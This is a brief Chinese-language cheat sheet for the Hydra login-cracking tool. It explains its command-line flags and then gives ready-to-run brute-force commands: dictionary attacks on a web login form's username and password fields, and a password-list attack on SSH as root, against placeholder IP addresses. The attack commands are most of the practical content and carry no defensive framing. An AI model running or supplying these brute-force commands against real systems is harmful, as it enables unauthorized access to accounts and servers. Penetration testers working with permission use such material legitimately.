hydra参数介绍
-l 指定破解的用户,对特定用户破解
-L 指定用户名字典
-p 小写,指定密码破解,少用,一般是采用密码字典
-P 大写,指定密码字典
-R 继续从上一次进度接着破解
-S 大写,采用SSL链接
-s 小写,可通过这个参数指定非默认端口
-e 可选选项,n:空密码试探,s:使用指定用户和密码试探
-t 同时运行的线程数,默认为16
-C 使用冒号分割格式,例如“登录名:密码”来代替 -L/-P 参数
-M 指定目标列表文件一行一条
-o 指定结果输出文件
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
-w 设置最大超时的时间,单位秒,默认是30s
-v/-V 显示详细过程
server 目标ip
service 指定服务名,支持的服务和协议
hydra爆破场景
hydra爆破API接口或表单
hydra -L ./常用用户名.txt -p 111111 -o ok.lst -t 5 -V -f 1.1.1.1 http-post-form "/login:teaId=^USER^&teaPwd=^PASS^&requestType=json:用户不存在"
hydra -l 20060138 -P ./渗透字典.txt -o ok.lst -t 5 -V -f 2.2.2.2 http-post-form "/login:teaId=^USER^&teaPwd=^PASS^&requestType=json:密码不正确"
hydra爆破ssh服务
hydra -l root -P ./常用密码.txt -t 4 ssh://3.3.3.3
网友评论